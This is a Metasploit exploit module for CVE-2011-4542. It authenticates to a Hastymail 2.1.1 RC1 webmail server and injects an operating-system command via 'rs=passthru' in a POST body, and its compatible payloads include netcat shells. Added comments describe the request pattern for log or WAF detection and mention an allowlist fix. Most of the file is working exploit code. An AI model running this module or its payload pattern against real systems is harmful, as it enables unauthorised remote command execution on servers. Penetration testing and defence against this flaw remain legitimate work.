Path: blob/master/modules/exploits/unix/webapp/hastymail_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit remote exploit module for CVE-2011-4542 (Hastymail 2.1.1 RC1).
#
# Per the module's own description, the flaw is the insecure use of
# call_user_func_array() in "lib/ajax_functions.php", and a valid Hastymail
# account is required to reach it.
#
# What the module puts on the wire, as visible in this file:
# * a login POST to "<base>?page=login" with the form fields user, pass and
#   login; a 303 response is treated as a successful login;
# * a POST to the base path whose body is "rs=passthru&" followed by two
#   "rsargs[]" values, the second one being the command to run.
# Request logs or WAF rules can match on that body shape, i.e. an "rs"
# parameter naming a PHP command-execution function. Server-side, the handler
# should only dispatch to an allowlist of registered functions; see the
# advisory URL in 'References' for the vendor-side fix.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module metadata and the three user-supplied options
  # (TARGETURI, USER, PASS).
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   the values below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Hastymail 2.1.1 RC1 Command Injection",
        'Description' => %q{
          This module exploits a command injection vulnerability found in Hastymail
        2.1.1 RC1 due to the insecure usage of the call_user_func_array() function on
        the "lib/ajax_functions.php" script. Authentication is required on Hastymail
        in order to exploit the vulnerability. The module has been successfully tested
        on Hastymail 2.1.1 RC1 over Ubuntu 10.04.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Bruno Teixeira', # Vulnerability Discovery
            'juan vazquez' # Metasploit module
          ],
        'References' =>
          [
            [ 'CVE', '2011-4542' ],
            [ 'BID', '50791' ],
            [ 'OSVDB', '77331' ],
            [ 'URL', 'https://www.dognaedis.com/vulns/DGS-SEC-3.html' ]
          ],
        'Payload' =>
          {
            'Compat' =>
              {
                'PayloadType' => 'cmd',
                'RequiredCmd' => 'generic perl ruby python netcat netcat-e',
              }
          },
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Targets' =>
          [
            ['Hastymail 2.1.1 RC1', {}]
          ],
        'Privileged' => false,
        'DisclosureDate' => '2011-11-22',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, "The base path to Hastymail", "/hastymail2/"]),
        OptString.new('USER', [true, "The username to authenticate with", ""]),
        OptString.new('PASS', [true, "The password to authenticate with", ""])
      ]
    )
  end

  # Verifies the flaw with a harmless probe: after logging in, it asks the
  # target to `echo` a random alphabetic token and looks for that token in
  # the response body.
  #
  # NOTE(review): a missing response or a non-200 status is also reported as
  # Safe, so Safe means "not confirmed" rather than "patched".
  #
  # @return [Exploit::CheckCode] Unknown when login yields no session cookie,
  #   Vulnerable when a 200 response echoes the token, Safe otherwise
  def check
    @uri = normalize_uri(target_uri.path)
    @uri << '/' unless @uri[-1, 1] == '/'
    @session_id = ""

    login

    if !@session_id || @session_id.empty?
      vprint_error "Authentication failed"
      return Exploit::CheckCode::Unknown
    end

    # The token is drawn first, then the filler argument, as in the request
    # body order below.
    test = rand_text_alpha(rand(4) + 4)
    data = [
      "rs=passthru",
      "rsargs[]=#{rand_text_alpha(rand(4) + 4)}",
      "rsargs[]=echo #{test}"
    ].join('&')

    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => "#{@uri}",
        'Cookie' => @session_id,
        'data' => data
      }
    )

    echoed = res && res.code == 200 && res.body =~ /#{test}/
    return Exploit::CheckCode::Safe unless echoed

    Exploit::CheckCode::Vulnerable
  end

  # Posts the USER/PASS datastore values to "<base>?page=login". When the
  # answer is a 303, the cookies from that response are stored in
  # @session_id; on any other outcome @session_id is left untouched.
  def login
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => "#{@uri}?page=login",
        'vars_post' =>
          {
            'user' => datastore['USER'],
            'pass' => datastore['PASS'],
            'login' => 'Login'
          }
      }
    )

    return unless res && res.code == 303

    @session_id = res.get_cookies
    print_good("Authentication Successful")
  end

  # Logs in and sends the same request shape as #check, with the
  # framework-encoded command payload as the second rsargs[] value.
  #
  # The request also carries a "Cmd" header holding the base64 form of the
  # payload. NOTE(review): nothing in this file shows what reads that
  # header; it is one more artifact to look for in captured requests.
  def exploit
    @uri = normalize_uri(target_uri.path)
    @uri << '/' unless @uri[-1, 1] == '/'
    @session_id = ""

    print_status "Trying login"
    login

    if !@session_id || @session_id.empty?
      print_error "Authentication failed"
      return
    end

    print_good "Authentication successfully, trying to exploit"

    data = [
      "rs=passthru",
      "rsargs[]=#{rand_text_alpha(rand(4) + 4)}",
      "rsargs[]=#{payload.encoded}"
    ].join('&')

    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => "#{@uri}",
        'Cookie' => @session_id,
        'headers' => {
          'Cmd' => Rex::Text.encode_base64(payload.encoded)
        },
        'data' => data
      }
    )

    # Success is a 200 response whose body contains a literal "+".
    # NOTE(review): presumably the AJAX layer's success marker; confirm.
    unless res && res.code == 200 && res.body =~ /\+/
      print_error "Exploitation failed"
      return
    end
  end
end